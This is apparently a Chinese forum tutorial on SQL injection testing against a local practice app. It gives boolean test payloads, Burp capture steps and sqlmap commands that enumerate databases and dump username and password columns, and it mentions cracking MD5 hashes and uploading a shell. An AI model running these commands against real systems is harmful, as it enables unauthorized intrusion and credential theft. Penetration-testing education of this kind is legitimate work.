|
SQL Inject漏洞测试流程 第一步:注入点探测自动方式:使用web漏洞扫描工具,自动进行注入点发现手动方式:手工构造sql inject测试语句进行注入点发现
第二步:信息获取通过注入点取期望得到的数据。
1.环境信息:数据库类型,数据库版本,操作系统版本,用户信息等。
2.数据库信息:数据库名称,数据库表,表字段,字段内容(加密内容破解)
第三步:获取权限 3 获取操作系统权限: 通过数据库执行shell,上传Shell
SQL Inject 漏洞-注入点类型-数字类型判断
测试提交:1 and 1=1 猜测SQL:select 字段名 from 表名 where id =1 and 1=1;
测试提交:1 and 1=2 猜测SQL:select 字段名 from 表名 where id =1 and 1=2;
开始测试
点击查询,然后我们利用burp抓包
将抓到的包全选复制,保存文件11.txt
并复制到sqlmap的根目录下/usr/share/sqlmap
开始测试
执行命令
[pre]
./sqlmap.py -r "11.txt"
[/pre]
这样就开始了sqlmap注入测试
获取数据库
[pre]
./sqlmap -r "11.txt" --dbs
[/pre]
获取表
[pre]
./sqlmap -r "11.txt" -D 数据库 --tables
[/pre]
获取表结构
[pre]
./sqlmap.py -r "11.txt" -D 数据库 -T 表名 --columns
[/pre]
获取表内容
[pre]
./sqlmap.py -r "11.txt" -D lou -T users -C "username,password" --dump
[/pre]
解密MD5
或者直接执行命令
[pre]
sqlmap -u http://192.168.123.129/vul/sqli/sqli_id.php --data "id=*&submit=%E6%9F%A5%E8%AF%A2" --dbs
[/pre]
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|